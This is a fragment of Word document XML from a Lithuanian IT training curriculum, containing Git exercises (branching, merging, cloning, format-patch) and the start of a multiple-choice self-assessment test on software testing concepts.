        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE BAZINES GIT KOMANDAS: GIT INIT, GIT CLONE, GIT STATU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6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.  APRAŠYKITE BAZINES GIT KOMANDAS: GIT ADD, GIT COMMIT, GIT RESET, GIT CHECKOUT</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7 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYKITE GIT KOMANDAS, KURIOS LEIS SUKURTI NAUJAS PROJEKTO ŠAKAS: TESTING, NEW</w:t>
      </w:r>
      <w:r w:rsidR="00853F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>-FEATURE</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Papildoma sąlyga: turi būti panaudotos Git komandos git branch ir git checkout</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8 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYKITE GIT KOMANDAS, KURIOS LEIS APJUNGTI </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">7 užduotyje </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURTAS ŠAKAS SU P</w:t>
      </w:r>
      <w:r w:rsidR="00AE6DD6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AGRINDINE SAUGYKLOS ŠAKA MASTER</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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Papildoma sąlyga: po apjungimo papildomos šakos turi būti ištrinto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9 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUKOPIJUOKITE KODO PAVYZDĮ IŠ NUOTOLINĖS GITHUB KODO SAUGYKLOS: HTTPS://GITHUB.CO</w:t>
      </w:r>
      <w:r w:rsidR="00853F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>M/ILUWATAR/JAVA-DESIGN-PATTERN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Lokaliai atlikite kelis pakeitimus šioje kodo saugykloje ir juos įrašykite į saugyklą. Papildoma sąlyga: turi būti panaudotos komandos</w:t>
      </w:r>
      <w:r w:rsidR="003937A7" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> git clone, git add, git commit</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10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE LOKALIĄ GIT KODO SAUGYKLĄ APLANKE VARDU CALCULATOR</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Sukurkite naują Java projektą ir realizuokite paprasto komandinės eilutės skaičiuotuvo funkcionalumą (+, -, *, /). Kiekvienas svarbesnis kodo pakeitimas turi būti įrašomas į kodo saugyklą su prasmingu komentaru. Papildoma sąlyga: turi būti panaudotos komandos git init, git add, git commit, git status, git log</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11 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SAVO SKAIČIUOTUVUI (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) PADARYKITE KODO PATAISYMUS IR JUOS EKSPORTUOKITE SU GIT KOMANDĄ GIT FORMAT-PATCH</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i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. GITHUB KODO TALPINIMO PLATFORMO</w:t>
      </w:r>
      <w:r w:rsidR="007A6978" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JE YRA PATALPINTAS REACT KODAS</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Jo repozitorija yra čia: </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:bCs/>
            <w:color w:val="006400"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://github.com/facebook/react</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Naudojant Git įrankį išanalizuokite kiek kodo eilučių buvo parašyta šiame projekte? Kiek programuotojų dirba prie pateikto projekto?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="_Toc10443993"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00850D0A" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="_Toc13095542"/>
      <w:bookmarkStart w:id="239" w:name="_Toc13833436"/>
      <w:bookmarkStart w:id="240" w:name="_Toc14392467"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „Į</w:t>
      </w:r>
      <w:r w:rsidRPr="00850D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>vadas į darbo rinką“</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
      <w:bookmarkEnd w:id="238"/>
      <w:bookmarkEnd w:id="239"/>
      <w:bookmarkEnd w:id="240"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B0488D" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="_Toc14392468"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>TESTAS ĮSIVERTINTI GEBĖJIMAMS BAIGUS PROGRAMĄ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="241"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00347C6C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Kuris i</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>š pateiktų apibrėžimų geriausiai apibūdina IS testavimą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Testavimo tikslas yra pademonstruoti, kad sistema veikia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Testavimo tikslas yra parodyti, kad sistema neturi klaidų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Testavimo tikslas yra parodyti, kad sistema atlieka funkcijas, kurias turi atlikti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Testavimas</w:t>
      </w:r>
      <w:r w:rsidR="007F0ADF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tai darbas su sistema su tikslu atrasti defektus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Panagrinėkite žemiau pateiktas testavimo lygių sąvokas. Sudėliokite jas eilės tvarka, kuria jie dažniausiai yra vykdomi. Pakomentuokite, jei matote kokių nors panašumų. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Sistemos testavimas; Priėmimo testavimas; modulio testavimas; integracijos testavimas; komponentų testavimas; sistemų integracijos testavimas; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005A1DD9" w:rsidP="00372B3A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Atsakymas:</w:t>
      </w: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contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Kuriomis iš žemiau išvardytų gairių remiasi priėmimo testavimas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reikalavimai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dizainas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programinis kodas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Sprendimų lentelės</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AE3EB5" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Išvardykite pagrindines testavimo proces</w:t>
      </w:r>
      <w:r w:rsidR="00F71554" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> fazes eilės tvarka</w:t>
      </w:r>
      <w:r w:rsidR="00F71554" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005A1DD9" w:rsidP="00372B3A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Atsakymas:</w:t>
      </w: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pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="284"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Kaip vadinamas p</w:t>
      </w:r>
      <w:r w:rsidR="00F71554" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>akartotinas testavimas, kuris yra atliekamas jau po to, kai sistema buvo ištestuota, su tikslu atrasti defektus, galimai atsiradusius po pakeitimų, ar kurios nors sistemos dalies atnaujinimo</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pertestavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Patvirtinimo testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Regresija</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Negatyvus testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Kuris iš žemiau pateiktų apibrėžimų yra dinaminės analizės technika, susijusi su sistemos našumo gerinimu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E3A4A" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
